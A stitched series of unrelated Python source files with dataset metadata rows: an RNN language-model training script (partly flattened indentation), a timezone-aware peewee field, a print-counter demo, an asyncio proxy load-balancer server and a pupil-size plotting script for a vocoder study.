        Two passes over the file: the first counts tokens and grows the
        vocabulary, the second fills a flat LongTensor of word ids.  Every
        line is terminated with an explicit <eos> marker.
        """
        assert os.path.exists(path)
        # Add words to the dictionary
        with open(path, 'r', encoding="utf8") as f:
            tokens = 0
            for line in f:
                words = line.split() + ['<eos>']
                tokens += len(words)
                for word in words:
                    self.dictionary.add_word(word)
        # Tokenize file content
        with open(path, 'r', encoding="utf8") as f:
            ids = torch.LongTensor(tokens)
            token = 0
            for line in f:
                words = line.split() + ['<eos>']
                for word in words:
                    ids[token] = self.dictionary.word2idx[word]
                    token += 1
        return ids
class RNNModel(nn.Module):
    """Container module with an encoder, a recurrent module, and a decoder.

    Fix over the original: ``rnn_type`` was ignored and ``getattr(nn, 'LSTM')``
    always built an LSTM, even though ``init_hidden`` branches on ``rnn_type``
    -- so a GRU/RNN model would crash on a hidden-state shape mismatch.  The
    recurrent layer is now constructed from ``rnn_type``.
    """

    def __init__(self, rnn_type, ntoken, ninp, nhid, nlayers, dropout=0.5, tie_weights=False):
        super(RNNModel, self).__init__()
        self.drop = nn.Dropout(dropout)
        self.encoder = nn.Embedding(ntoken, ninp)
        if rnn_type in ('LSTM', 'GRU'):
            self.rnn = getattr(nn, rnn_type)(ninp, nhid, nlayers, dropout=dropout)
        elif rnn_type in ('RNN_TANH', 'RNN_RELU'):
            # RNN_TANH / RNN_RELU map onto nn.RNN with a nonlinearity argument.
            nonlinearity = {'RNN_TANH': 'tanh', 'RNN_RELU': 'relu'}[rnn_type]
            self.rnn = nn.RNN(ninp, nhid, nlayers, nonlinearity=nonlinearity,
                              dropout=dropout)
        else:
            raise ValueError("Invalid rnn_type: expected one of "
                             "'LSTM', 'GRU', 'RNN_TANH', 'RNN_RELU'")
        self.decoder = nn.Linear(nhid, ntoken)

        # Optionally tie weights as in:
        # "Using the Output Embedding to Improve Language Models" (Press & Wolf 2016)
        # https://arxiv.org/abs/1608.05859
        # and
        # "Tying Word Vectors and Word Classifiers: A Loss Framework for Language Modeling" (Inan et al. 2016)
        # https://arxiv.org/abs/1611.01462
        if tie_weights:
            if nhid != ninp:
                raise ValueError('When using the tied flag, nhid must be equal to emsize')
            self.decoder.weight = self.encoder.weight

        self.rnn_type = rnn_type
        self.nhid = nhid
        self.nlayers = nlayers

    def forward(self, input, hidden):
        """Map token ids (seq, batch) to per-token vocabulary logits (seq, batch, V)."""
        emb = self.drop(self.encoder(input))  # (seq, batch, ninp)
        output, hidden = self.rnn(emb, hidden)  # output: (seq, batch, nhid)
        output = self.drop(output)
        decoded = self.decoder(output.view(output.size(0) * output.size(1), output.size(2)))
        return decoded.view(output.size(0), output.size(1), decoded.size(1)), hidden

    def init_hidden(self, bsz):
        """Return a zeroed hidden state for batch size *bsz* ((h, c) tuple for LSTM)."""
        weight = next(self.parameters())
        if self.rnn_type == 'LSTM':
            return (weight.new_zeros(self.nlayers, bsz, self.nhid),
                    weight.new_zeros(self.nlayers, bsz, self.nhid))
        else:
            return weight.new_zeros(self.nlayers, bsz, self.nhid)
def batchify(data, bsz):
    """Trim *data* to a multiple of *bsz* and reshape it into bsz parallel columns.

    Returns a (nbatch, bsz) tensor on the module-level ``device``; each column
    is a contiguous stream of the corpus.
    """
    # Work out how cleanly we can divide the dataset into bsz parts and drop
    # the trailing remainder that would not fill a full column.
    nbatch = data.size(0) // bsz
    trimmed = data.narrow(0, 0, nbatch * bsz)
    batched = trimmed.view(bsz, -1).t().contiguous()
    return batched.to(device)
def repackage_hidden(h):
    """Wraps hidden states in new Tensors, to detach them from their history."""
    if isinstance(h, torch.Tensor):
        return h.detach()
    # An LSTM hidden state is an (h, c) tuple: detach each member recursively.
    return tuple(repackage_hidden(part) for part in h)
def get_batch(source, i):
    """Return the BPTT chunk starting at row *i* and its next-word targets.

    ``data`` is source[i:i+seq_len] with shape (seq_len, batch); ``target`` is
    the same slice shifted one time-step and flattened.  Near the end of the
    corpus the chunk may be shorter than args.bptt.
    """
    seq_len = min(args.bptt, len(source) - 1 - i)
    data = source[i:i+seq_len]# [ seq , batchsz ]
    target = source[i+1:i+1+seq_len].view(-1)# batchsz * seq
    return data, target
def evaluate(data_source):
    """Return the average per-token cross-entropy loss over *data_source*.

    Uses the module-level ``model``/``corpus``/``criterion``; runs in eval
    mode with gradients disabled and carries the hidden state across BPTT
    chunks, detaching it between chunks.
    """
    # Turn on evaluation mode which disables dropout.
    model.eval()
    total_loss = 0.
    ntokens = len(corpus.dictionary)
    hidden = model.init_hidden(eval_batch_size)
    with torch.no_grad():
        for i in range(0, data_source.size(0) - 1, args.bptt):
            data, targets = get_batch(data_source, i)
            output, hidden = model(data, hidden)
            output_flat = output.view(-1, ntokens)#p(wn|wn−1,…,w1,START)=softmax(Whn−1+b), where W is the weight matrix, hn−1 is the last hidden state from RNN and b is the bias term.
            # Weight each chunk's mean loss by its length so the final value
            # is a true per-token average even when the last chunk is short.
            total_loss += len(data) * criterion(output_flat, targets).item()
            hidden = repackage_hidden(hidden)
    return total_loss / (len(data_source) - 1)
def train():
    """Run one training epoch over the module-level ``train_data``.

    Bug fixes over the original:
      * parameters were updated TWICE per batch -- once by ``optimizer.step()``
        and once by the manual SGD loop.  Only the manual update is kept,
        because it honours the annealed learning rate ``lr`` (the optimizer
        was constructed with the fixed initial ``args.lr``);
      * ``clip_grad_norm_`` was called AFTER the update, where it had no
        effect on the step just taken -- it now runs before the update.
    """
    # Turn on training mode which enables dropout.
    model.train()
    total_loss = 0.
    start_time = time.time()
    ntokens = len(corpus.dictionary)
    hidden = model.init_hidden(args.batch_size)
    for batch, i in enumerate(range(0, train_data.size(0) - 1, args.bptt)):
        data, targets = get_batch(train_data, i)
        # Starting each batch, we detach the hidden state from how it was previously produced.
        # If we didn't, the model would try backpropagating all the way to start of the dataset.
        hidden = repackage_hidden(hidden)
        model.zero_grad()
        output, hidden = model(data, hidden)
        loss = criterion(output.view(-1, ntokens), targets)
        loss.backward()  # backpropagation through time
        # `clip_grad_norm_` helps prevent the exploding gradient problem in RNNs / LSTMs.
        torch.nn.utils.clip_grad_norm_(model.parameters(), args.clip)
        # Manual SGD step using the (possibly annealed) learning rate.
        for p in model.parameters():
            p.data.add_(-lr, p.grad.data)

        total_loss += loss.item()
        if batch % args.log_interval == 0 and batch > 0:
            cur_loss = total_loss / args.log_interval
            print('| epoch {:3d} | {:5d}/{:5d} batches | lr {:02.2f} | '
                  ' cur_avg_loss {:5.2f} | current_perplexity {:8.2f}'.format(
                      epoch, batch, len(train_data) // args.bptt, lr,
                      cur_loss, math.exp(cur_loss)))
            total_loss = 0
            start_time = time.time()
def export_onnx(path, batch_size, seq_len):
    """Export the (module-level) trained model to ONNX at *path*.

    Traces the model in eval mode with an all-zeros dummy input of shape
    (seq_len, batch_size) plus a freshly initialised hidden state.
    """
    print('The model is also exported in ONNX format at {}'.
          format(os.path.realpath(args.onnx_export)))
    model.eval()
    dummy_input = torch.LongTensor(seq_len * batch_size).zero_().view(-1, batch_size).to(device)
    hidden = model.init_hidden(batch_size)
    torch.onnx.export(model, (dummy_input, hidden), path)
# Set the random seed manually for reproducibility.
torch.manual_seed(args.seed)
if torch.cuda.is_available():
if not args.cuda:
print("WARNING: You have a CUDA device, so you should probably run with --cuda")
device = torch.device("cuda" if args.cuda else "cpu")
###############################################################################
# Load data
###############################################################################
corpus = Corpus(args.data)
eval_batch_size = args.batch_size
train_data = batchify(corpus.train, args.batch_size)
dev_data = batchify(corpus.dev, eval_batch_size)
test_data = batchify(corpus.test, eval_batch_size)
###############################################################################
# Build the model
###############################################################################
ntokens = len(corpus.dictionary)
model = RNNModel(args.model, ntokens, args.emsize, args.nhid, args.nlayers, args.dropout, args.tied).to(device)
optimizer = torch.optim.SGD(model.parameters(), lr=args.lr)
criterion = nn.CrossEntropyLoss()# no need softmax
###############################################################################
# Training code
###############################################################################
# Loop over epochs.
lr = args.lr
best_val_loss = None
# At any point you can hit Ctrl + C to break out of training early.
try:
for epoch in range(1, args.epochs+1):
epoch_start_time = time.time()
train()
trn_ppl = evaluate(train_data)
dev_ppl = evaluate(dev_data)
print('End of epoch {:3d} | Perplexity on training data is {:8.2f}'.format(epoch, math.exp(trn_ppl)))
print('End of epoch {:3d} | Perplexity on development data is {:8.2f}\n'.format(epoch, math.exp(dev_ppl)))
# Save the model if the validation loss is the best we've seen so far.
if not best_val_loss or dev_ppl < best_val_loss:
with open(args.save, 'wb') as f:
torch.save(model, f)
best_val_loss = dev_ppl
else:
# Anneal the learning rate if no improvement has been seen in the validation dataset.
lr /= 4.0
except KeyboardInterrupt:
print('Exiting from training early')
# Load the best saved model.
with open(args.save, 'rb') as f:
model = torch.load(f)
# after load the rnn params are not a continuous chunk of memory
# this makes them a continuous chunk, and will speed up forward pass
model.rnn.flatten_parameters()
# Run on test data.
dev_loss = evaluate(dev_data)
print('| End of training | test loss {:5.2f} | test ppl {:8.2f}'.format(
dev_loss, math.exp(dev_loss)))
if len(args.onnx_export) > 0:
# Export the model in ONNX format.
export_onnx(args.onnx_export, batch_size=1, seq_len=args.bptt)
| jia-yi-chen/Natural-Language-Processing-all | language_modeling/main-minibatch-rnnlm.py | main-minibatch-rnnlm.py | py | 12,033 | python | en | code | 1 | github-code | 36 | [
{
"api_name": "argparse.ArgumentParser",
"line_number": 13,
"usage_type": "call"
},
{
"api_name": "os.path.exists",
"line_number": 75,
"usage_type": "call"
},
{
"api_name": "os.path",
"line_number": 75,
"usage_type": "attribute"
},
{
"api_name": "torch.LongTensor"... |
850231959 | import datetime as dt
from peewee import DataError
from playhouse.postgres_ext import DateTimeTZField
class DateTimeTzField(DateTimeTZField):
    """Timezone-aware datetime field: stores naive UTC in the DB, returns aware values.

    Write path rejects naive datetimes outright (silently assuming a zone
    would corrupt data from mixed-timezone callers); read path re-attaches
    tzinfo=UTC, since every stored value is known to be UTC.
    """
    def db_value(self, value):
        if value is not None:
            if value.tzinfo is None:
                raise DataError(f'Cannot use naive datetime "{value}" in DateTimeTzField')
            # Normalise to UTC and strip tzinfo: the column itself is naive.
            value = value.astimezone(dt.timezone.utc).replace(tzinfo=None)
        return super(DateTimeTzField, self).db_value(value)

    def python_value(self, value):
        value = super(DateTimeTzField, self).python_value(value)
        if value is not None:
            # Mark the stored (naive) UTC value as timezone-aware.
            value = value.replace(tzinfo=dt.timezone.utc)
        return value
{
"api_name": "playhouse.postgres_ext.DateTimeTZField",
"line_number": 6,
"usage_type": "name"
},
{
"api_name": "peewee.DataError",
"line_number": 10,
"usage_type": "call"
},
{
"api_name": "datetime.timezone",
"line_number": 11,
"usage_type": "attribute"
},
{
"api... |
828214309 | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Thu May 24 23:37:57 2018
@author: pt
"""
# Three ways to print an updating counter.
# BUG FIX: the original called time.sleep() in the second loop BEFORE
# `import time` was executed further down the script, so the first loop
# iteration raised NameError.  All imports now precede their first use.
import sys
import time

from IPython.display import clear_output

# Plain carriage-return prints (each value still lands on its own line,
# because print appends a newline after the '\r').
for i in range(1, 10):
    print(str(i) + '\r')

# Notebook-friendly: clear the cell output before each print.
for f in range(10):
    clear_output(wait=True)
    print(f)
    time.sleep(.1)

# Terminal-friendly: overwrite the line in place with '\r' + flush.
for f in range(10):
    # delete "\r" to append instead of overwrite
    sys.stdout.write("\r" + str(f))
    sys.stdout.flush()
    time.sleep(.1)
{
"api_name": "IPython.display.clear_output",
"line_number": 18,
"usage_type": "call"
},
{
"api_name": "sys.stdout.write",
"line_number": 28,
"usage_type": "call"
},
{
"api_name": "sys.stdout",
"line_number": 28,
"usage_type": "attribute"
},
{
"api_name": "sys.std... |
41676958983 | import time
import asyncio
import logging
from config import CONFIG
from proxy import get_proxy
from errors import (
BadStatusLine, BadResponseError, ErrorOnStream,
NoProxyError, ProxyRecvError, ProxyTimeoutError)
from utils import parse_headers, parse_status_line
logger = logging.getLogger(__name__)
request_logger = logging.getLogger('proxy_request')
global_requests = []
CONNECTED = b'HTTP/1.1 200 Connection established\r\n\r\n'
class Server:
    """Server distributes incoming requests to its pool of proxies.
    Each instance of this class is a 'pool' which has proxies.
    TODOs:
        - The pool should at all times have calculated stats about the proxies in its pool
    """
    def __init__(self, host, port, timeout=30, loop=None):
        # host/port: local listening address; timeout: per-read stream
        # timeout in seconds; loop: optional externally-owned event loop.
        self.host = host
        self.port = int(port)
        self._loop = loop or asyncio.get_event_loop()
        self._timeout = timeout
        self._server = None
        # Maps in-flight handler futures -> (client_reader, client_writer).
        self._connections = {}

    def start(self):
        """Bind the listening socket and register the accept callback."""
        srv = asyncio.start_server(
            self._accept, host=self.host, port=self.port, loop=self._loop)
        self._server = self._loop.run_until_complete(srv)
        logger.info('Listening established on {0}'.format(
            self._server.sockets[0].getsockname()))

    def stop(self):
        """Cancel in-flight connections, close the listener and stop the loop."""
        if not self._server:
            return
        for conn in self._connections:
            if not conn.done():
                conn.cancel()
        self._server.close()
        if not self._loop.is_running():
            self._loop.run_until_complete(self._server.wait_closed())
            # Time to close the running futures in self._connections
            self._loop.run_until_complete(asyncio.sleep(0.5))
        self._server = None
        self._loop.stop()
        logger.info('Server is stopped')

    def _accept(self, client_reader, client_writer):
        """Per-connection accept callback: schedule _handle and track the future."""
        def _on_completion(f):
            # Always close the client writer once the handler finishes.
            reader, writer = self._connections.pop(f)
            writer.close()
            logger.debug('client: %d; closed' % id(client_reader))
            try:
                exc = f.exception()
            except asyncio.CancelledError:
                logger.error('CancelledError in server._handle:_on_completion')
                exc = None
            if exc:
                # No proxies left means the server cannot do useful work.
                if isinstance(exc, NoProxyError):
                    self.stop()
                else:
                    raise exc
        f = asyncio.ensure_future(self._handle(client_reader, client_writer))
        f.add_done_callback(_on_completion)
        self._connections[f] = (client_reader, client_writer)

    async def _handle(self, client_reader, client_writer):
        """Proxy one client connection: pick a proxy, pump bytes both ways, log stats."""
        logger.debug(f"Accepted connection from {client_writer.get_extra_info('peername')}")
        time_of_request = int(time.time())  # The time the request was requested
        request, headers = await self._parse_request(client_reader)
        scheme = self._identify_scheme(headers)
        client = id(client_reader)
        error = None
        stime = 0
        proxy, pool = await get_proxy(headers['Host'], self.port)
        proto = self._choice_proto(proxy, scheme)
        logger.debug(f'client: {client}; request: {request}; headers: {headers}; '
                     f'scheme: {scheme}; proxy: {proxy}; proto: {proto}')
        try:
            await proxy.connect()
            # For CONNECT/SOCKS proxies handling HTTPS, acknowledge the
            # tunnel to the client instead of forwarding the raw request.
            if proto in ('CONNECT:80', 'SOCKS4', 'SOCKS5'):
                if scheme == 'HTTPS' and proto in ('SOCKS4', 'SOCKS5'):
                    client_writer.write(CONNECTED)
                    await client_writer.drain()
                else:  # HTTP
                    await proxy.send(request)
            else:  # proto: HTTP & HTTPS
                await proxy.send(request)
            stime = time.time()
            # Two concurrent pumps: client -> proxy and proxy -> client; only
            # the response direction gets status-line validation (scheme set).
            stream = [asyncio.ensure_future(self._stream(reader=client_reader, writer=proxy.writer)),
                      asyncio.ensure_future(self._stream(reader=proxy.reader, writer=client_writer, scheme=scheme))
                      ]
            await asyncio.gather(*stream, loop=self._loop)
        except asyncio.CancelledError:
            logger.error('Cancelled in server._handle')
            error = 'Cancelled in server._handle'
        except ErrorOnStream as e:
            logger.error(f'client: {client}; EOF: {client_reader.at_eof()}; Error: {e}')
            for task in stream:
                if not task.done():
                    task.cancel()
            if client_reader.at_eof() and 'Timeout' in repr(e):
                # Proxy may not be able to receive EOF and will raise a
                # TimeoutError, but all the data has already successfully
                # returned, so do not consider this error of proxy
                error = 'TimeoutError'
            if scheme == 'HTTPS':  # SSL Handshake probably failed
                error = 'SSL Error'
        except ProxyTimeoutError:
            logger.error("Proxy timeout")
            error = 'Proxy Timeout'
            # TODO: Send client a 408 status code
        except Exception as e:
            # Catch anything that falls through
            logger.exception("Catch all in server")
            error = repr(e)
        finally:
            proxy.log(request.decode(), stime)
            # At this point, the client has already disconnected and now the stats can be processed and saved
            try:
                if CONFIG.get('Server', {}).get('Log_Requests', True):
                    proxy_url = f'{proxy.host}:{proxy.port}'
                    path = None
                    # Can get path for http requests, but not for https
                    if '/' in headers.get('Path', ''):
                        path = '/' + headers.get('Path', '').split('/')[-1]
                    try:
                        status_code = parse_status_line(stream[1].result().split(b'\r\n', 1)[0].decode()).get('Status')
                    except Exception as e:
                        logger.warning(f"Issue saving status code: proxy={proxy_url}; host={headers.get('Host')}")
                        status_code = None
                        if error is None:
                            error = repr(e)
                    try:
                        proxy_bandwidth_up = len(stream[0].result()) + proxy.stats.get('bandwidth_up', 0)
                        proxy_bandwidth_down = len(stream[1].result()) + proxy.stats.get('bandwidth_down', 0)
                    except Exception:
                        # Happens if something goes wrong with the connection
                        logger.warning(f"Issue saving bandwidth: proxy={proxy_url}; host={headers.get('Host')}")
                        proxy_bandwidth_up = None
                        proxy_bandwidth_down = None
                    request_log = {'host': headers.get('Host'),
                                   'proxy': proxy_url,
                                   'path': path,
                                   'scheme': scheme,
                                   'bw_up': proxy_bandwidth_up,
                                   'bw_down': proxy_bandwidth_down,
                                   'status_code': status_code,
                                   'error': error,
                                   'total_time': proxy.stats['total_time'],
                                   'ts': time_of_request,
                                   'pool_name': pool,
                                   'proxy_port': self.port
                                   }
                    request_logger.info('Request made', extra=request_log)
            except Exception:
                logger.exception("Failed to save request data")
            proxy.close()

    async def _parse_request(self, reader, length=65536):
        """Read the client's initial request and parse its headers."""
        request = await reader.read(length)
        headers = parse_headers(request)
        if headers['Method'] == 'POST' and request.endswith(b'\r\n\r\n'):
            # For aiohttp. POST data returns on second reading
            request += await reader.read(length)
        return request, headers

    def _identify_scheme(self, headers):
        # CONNECT requests establish a tunnel, which implies HTTPS traffic.
        if headers['Method'] == 'CONNECT':
            return 'HTTPS'
        else:
            return 'HTTP'

    def _choice_proto(self, proxy, scheme):
        """Pick which of the proxy's supported protocols to use for *scheme*."""
        if scheme == 'HTTP':
            # Prefer CONNECT:80 when available; otherwise any HTTP-capable type.
            if 'CONNECT:80' in proxy.types:
                proto = 'CONNECT:80'
            else:
                relevant = ({'HTTP', 'CONNECT:80', 'SOCKS4', 'SOCKS5'} &
                            proxy.types)
                proto = relevant.pop()
        else:  # HTTPS
            relevant = {'HTTPS', 'SOCKS4', 'SOCKS5'} & proxy.types
            proto = relevant.pop()
        return proto

    async def _stream(self, reader, writer, length=65536, scheme=None):
        """Pump bytes reader -> writer until EOF; return everything forwarded.

        When *scheme* is set, the first chunk is validated as an HTTP status
        line.  Any transport/validation error is re-raised as ErrorOnStream.
        """
        checked = False
        total_data = b''
        try:
            while not reader.at_eof():
                data = await asyncio.wait_for(reader.read(length), self._timeout)
                if not data:
                    writer.close()
                    break
                elif scheme and not checked:
                    self._check_response(data, scheme)
                    checked = True
                total_data += data
                writer.write(data)
                await writer.drain()
        except (asyncio.TimeoutError, ConnectionResetError, OSError,
                ProxyRecvError, BadResponseError) as e:
            raise ErrorOnStream(e)
        return total_data

    def _check_response(self, data, scheme):
        """Validate the first response chunk's status line; raise BadResponseError if malformed."""
        if scheme.startswith('HTTP'):
            # Check both HTTP & HTTPS requests
            line = data.split(b'\r\n', 1)[0].decode()
            try:
                parse_status_line(line)
            except BadStatusLine:
                raise BadResponseError
| ScraperX/proxy-load-balancer | server.py | server.py | py | 9,751 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "logging.getLogger",
"line_number": 11,
"usage_type": "call"
},
{
"api_name": "logging.getLogger",
"line_number": 12,
"usage_type": "call"
},
{
"api_name": "asyncio.get_event_loop",
"line_number": 30,
"usage_type": "call"
},
{
"api_name": "asyncio.st... |
3314836701 | # -*- coding: utf-8 -*-
"""
===============================================================================
Script 'fig-pupil-voc'
===============================================================================
This script plots pupil size & significance tests for the vocoder experiment.
"""
# @author: Dan McCloy (drmccloy@uw.edu)
# Created on Fri Sep 25 11:15:34 2015
# License: BSD (3-clause)
import yaml
import os.path as op
import numpy as np
import matplotlib.pyplot as plt
from pandas import DataFrame
from matplotlib.colors import colorConverter as cc
from scipy.stats import distributions
from mne.stats import spatio_temporal_cluster_1samp_test, ttest_1samp_no_p
from convenience_functions import (box_off, use_font, tick_label_size,
hatch_between, read_data)
from functools import partial
# mostly rcParams stuff
plt.ioff()
use_font('source')
tick_label_size(10)
# flags
plot_stderr = True
plot_signif = True
show_pval = False
savefig = True
use_deconv = True
only_perfect = False
# file I/O
work_dir = '..'
out_dir = op.join(work_dir, 'results')
voc_file = op.join(work_dir, 'voc_data.npz')
perfect_filename = '-perfect' if only_perfect else ''
vv = np.load(voc_file)
data_deconv, t_fit, subjects = vv['fits_struct'], vv['t_fit'], vv['subjects']
data_zscore, fs, kernel = vv['zscores_struct'], vv['fs'], vv['kernel']
'''
data_zscore.shape
16, 40, 2, 2, 2, 6550
subj trials 200/600gap maint/switch 10/20chan samples
(similar for data_deconv, with fewer samples along last dimension)
'''
# params
stim_times = np.array([0, 0.5, 1.5, 2.0, 2.5, 3.0]) # gap not included (yet)
stim_dur = 0.47 # really 0.5, but leave a tiny gap to visually distinguish
t_kernel_peak = np.where(kernel == kernel.max())[0][0] / float(fs)
t_min, t_max = -0.5, 6. - t_kernel_peak
t_zs = t_min + np.arange(data_zscore.shape[-1]) / float(fs)
stat_fun = partial(ttest_1samp_no_p, sigma=1e-3)
# colors
cue, msk, blu, red = '0.75', '0.75', '#332288', '#cc6677'
signifcol = '0.9'
axiscol = '0.8'
tickcol = '0.8'
axislabcol = '0.3'
ticklabcol = '0.5'
# get behavioral data
if only_perfect:
path = op.join(work_dir, 'data-behavioral', 'voc-behdata-longform.tsv')
beh_data = read_data(path, parse_presses=False)
beh_data['perfect'] = np.logical_and(beh_data['misses'] == 0,
beh_data['false_alarms'] == 0)
cols = ['subj', 'gap_len', 'attn', 'voc_chan']
beh_data = beh_data.sort_values(by=cols)
dims = [len(beh_data[c].unique()) for c in cols]
dims.insert(1, -1)
perfect_ix = beh_data['perfect'].reshape(dims)
voc_10_ix = (beh_data['voc_chan'] == 10).reshape(dims)
voc_20_ix = (beh_data['voc_chan'] == 20).reshape(dims)
gap_200_ix = (beh_data['gap_len'] == 'short').reshape(dims)
gap_600_ix = (beh_data['gap_len'] == 'long').reshape(dims)
maint_ix = (beh_data['attn'] == 'maint.').reshape(dims)
switch_ix = (beh_data['attn'] == 'switch').reshape(dims)
# set up figure
fig, axs = plt.subplots(3, 1, figsize=(3, 6.5))
xlim = [t_min, t_max]
times = [t_fit] if use_deconv else [t_zs]
datas = [data_deconv] if use_deconv else [data_zscore]
for t, data in zip(times, datas):
# collapse across trials and experimental contrasts
# axis 1 is trials, 2 is gap dur, 3 is maint/switch, 4 is num voc channels
chan_10_vs_20 = np.nanmean(data, axis=(1, 2, 3))
gap_200_vs_600 = np.nanmean(data, axis=(1, 3, 4))
maint_vs_switch = np.nanmean(data, axis=(1, 2, 4))
# if only analyzing trials with perfect behavioral response, recompute
# the per-subject mean pupil resp. by condition using only those trials
# (a bit awkward because of potentially unequal counts)
if only_perfect:
# temporarily set these to infinite values (to check later that they
# got properly re-assigned)
chan_10_vs_20 = np.full_like(chan_10_vs_20, np.inf)
gap_200_vs_600 = np.full_like(gap_200_vs_600, np.inf)
maint_vs_switch = np.full_like(maint_vs_switch, np.inf)
# keep track of how many correct trials per condition
n_perfect_trials = dict()
for ix, subj in enumerate(subjects):
sj = np.zeros_like(perfect_ix)
sj[ix] = True
v10 = np.logical_and(perfect_ix, voc_10_ix)
v20 = np.logical_and(perfect_ix, voc_20_ix)
g2 = np.logical_and(perfect_ix, gap_200_ix)
g6 = np.logical_and(perfect_ix, gap_600_ix)
mn = np.logical_and(perfect_ix, maint_ix)
sw = np.logical_and(perfect_ix, switch_ix)
chan_10_vs_20[ix] = np.array([np.nanmean(data[sj & v10], axis=0),
np.nanmean(data[sj & v20], axis=0)])
gap_200_vs_600[ix] = np.array([np.nanmean(data[sj & g2], axis=0),
np.nanmean(data[sj & g6], axis=0)])
maint_vs_switch[ix] = np.array([np.nanmean(data[sj & mn], axis=0),
np.nanmean(data[sj & sw], axis=0)])
# bookkeeping for n_perfect_trials
conds = dict()
conds['voc'] = {10: np.logical_and(v10, sj).sum(),
20: np.logical_and(v20, sj).sum()}
conds['gap'] = {200: np.logical_and(g2, sj).sum(),
600: np.logical_and(g6, sj).sum()}
conds['attn'] = {'maint': np.logical_and(mn, sj).sum(),
'switch': np.logical_and(sw, sj).sum()}
n_perfect_trials[subj] = conds
assert np.all(np.isfinite(chan_10_vs_20))
assert np.all(np.isfinite(gap_200_vs_600))
assert np.all(np.isfinite(maint_vs_switch))
# axis limits
ymax = np.max(np.mean(np.nanmean(data, axis=1), axis=0)) # ceil
ymax = 10 ** np.trunc(np.log10(ymax)) if ymax < 1 else np.ceil(ymax)
ylim = [-0.6 * ymax, ymax]
# y values for stim timecourse diagram
stim_ymin = ymax * -0.45
stim_ymax = ymax * -0.3
for jj, (contrast, ax) in enumerate(zip([chan_10_vs_20, gap_200_vs_600,
maint_vs_switch], axs)):
# within-subject difference between conditions
contr_diff = (contrast[:, 1, :] - contrast[:, 0, :])[:, :, np.newaxis]
# collapse across subjects (only for plotting, not stats)
contr_std = np.std(contrast, axis=0) / np.sqrt(len(contrast) - 1)
contr_mean = np.mean(contrast, axis=0)
# vars for trial timecourse
gaps = [[0.6, 0.6], [0.2, 0.6], [0.6, 0.6]][jj]
labels = [['10 band', '20 band'], ['short gap', 'long gap'],
['maintain', 'switch']][jj]
colors = [[cue, cue], [cue, cue], [blu, red]][jj]
# plot curves
for kk, (cond, se) in enumerate(zip(contr_mean, contr_std)):
col = colors[kk]
linecol = [blu, red][kk]
tcol = cc.to_rgb(linecol) + (0.4,) # add alpha channel
tcol_hex = '#' + ''.join('%02x' % int(x * 255) for x in tcol)
zord = [2, 0][kk]
# plot standard error bands
if plot_stderr:
_ = ax.fill_between(t, cond-se, cond+se, color=tcol,
edgecolor='none', zorder=zord + 2)
# plot mean lines
_ = ax.plot(t, cond, color=linecol, linewidth=1.2, zorder=zord + 3)
# TRIAL TIMECOURSE
thk = 0.04 * ymax
off = 0.15 * ymax
loff = 0.01 * ymax
stim_y = [stim_ymin, stim_ymax][kk]
label_y = [stim_ymax, stim_ymax-off][kk]
# lines beneath stim boxes
if kk: # "switch" line
xnodes = (1, 2.5, 2.7, 4.4) if jj == 1 else (1, 2.5, 3.1, 4.4)
ynodes = (stim_y-loff, stim_y-loff,
stim_y-off+loff, stim_y-off+loff)
ax.plot(xnodes, ynodes, color=col, linewidth=1.,
linestyle='--', zorder=7)
else: # "maintain" line
ynodes = (stim_ymax+loff, stim_ymax+loff)
ax.plot((1, 4.4), ynodes, color=col, linewidth=1.,
solid_capstyle='butt', zorder=7)
# boxes
gap_offsets = np.array([0] * 4 + [gaps[kk]] * 2)
stim_t = stim_times + gap_offsets
box_x = np.r_[stim_t, stim_t[2:]]
box_y = np.array([stim_ymax] * 6 + [stim_ymin] * 4)
box_u = np.array([thk] * 10)
box_d = np.array([thk] * 10)
# colors must be tuples (not hex strings) for alpha to work
box_c = [cc.to_rgba(x) for x in [cue] * 2 + [msk] * 8]
if jj == 1:
box_u[4:6] *= (1 - kk) + 0.5
box_u[8:] *= (1 - kk) + 0.5
box_d[4:6] *= kk
box_d[8:] *= kk
box_c[4:6] = [cc.to_rgba(linecol)] * 2 # or tcol
box_c[8:] = [cc.to_rgba(linecol)] * 2
if not kk:
indices = np.array([4, 5, 8, 9])
box_x = box_x[indices]
box_y = box_y[indices]
box_u = box_u[indices]
box_d = box_d[indices]
box_c = np.array(box_c)[indices]
if jj == 1 or kk:
for x, y, c, u, d in zip(box_x, box_y, box_c, box_u, box_d):
c = cc.to_rgba_array(c)
ax.fill_between((x, x+stim_dur), y+u, y-d, color=c,
edgecolor='none', zorder=9)
# timecourse labels
xtxt = [-0.1, -0.1, 4.4][jj]
ytxt = [[0.09, 0.075], [0.09, 0.075],
[stim_ymax, stim_ymin]][jj][kk]
xytxt = [(0, 0), (0, 0), (5, 0)][jj]
_ = ax.annotate(labels[kk], (xtxt, ytxt), xytext=xytxt,
textcoords='offset points', color=linecol,
ha='left', va='center', fontsize=9)
# cue label
_ = ax.annotate('cue', xy=(stim_times[1], stim_ymax + thk),
xytext=(0, 1.5), textcoords='offset points',
fontsize=9, fontstyle='italic', ha='center',
va='bottom', color='0.5')
# stats
if plot_signif:
thresh = -1 * distributions.t.ppf(0.05 / 2, len(contr_diff) - 1)
result = spatio_temporal_cluster_1samp_test(
contr_diff, threshold=thresh, stat_fun=stat_fun, n_jobs=6,
buffer_size=None, n_permutations=np.inf)
tvals, clusters, cluster_pvals, H0 = result
signif = np.where(np.array([p <= 0.05 for p in cluster_pvals]))[0]
signif_clusters = [clusters[s] for s in signif]
signif_cluster_pvals = cluster_pvals[signif]
# we only need x[0] in clusters because this is 1-D data; x[1] in
# clusters is just a list of all zeros (no spatial connectivity).
# All the hacky conversions to float, int, and list are because
# yaml doesn't understand numpy dtypes.
pupil_signifs = dict(thresh=float(thresh),
n_clusters=len(clusters),
clusters=[[int(y) for y in x[0]]
for x in clusters],
tvals=tvals.tolist(),
pvals=cluster_pvals.tolist())
label = '_vs_'.join([l.replace(' ', '-') for l in labels])
fname = 'voc_cluster_signifs_{}.yaml'.format(label)
with open(op.join(out_dir, fname), 'w') as f:
yaml.dump(pupil_signifs, stream=f)
# plot stats
for clu, pv in zip(signif_clusters, signif_cluster_pvals):
'''
# this index tells direction of tval, hence could be used to
# decide which color to draw the significant cluster region
# based on which curve is higher:
idx = (np.sign(tvals[clu[0][0], 0]).astype(int) + 1) // 2
'''
clu = clu[0]
cluster_ymin = ylim[0] * np.ones_like(t[clu])
cluster_ymax = np.max(contr_mean[:, clu], axis=0) # under top
pval_x = t[int(np.mean(clu[[0, -1]]))]
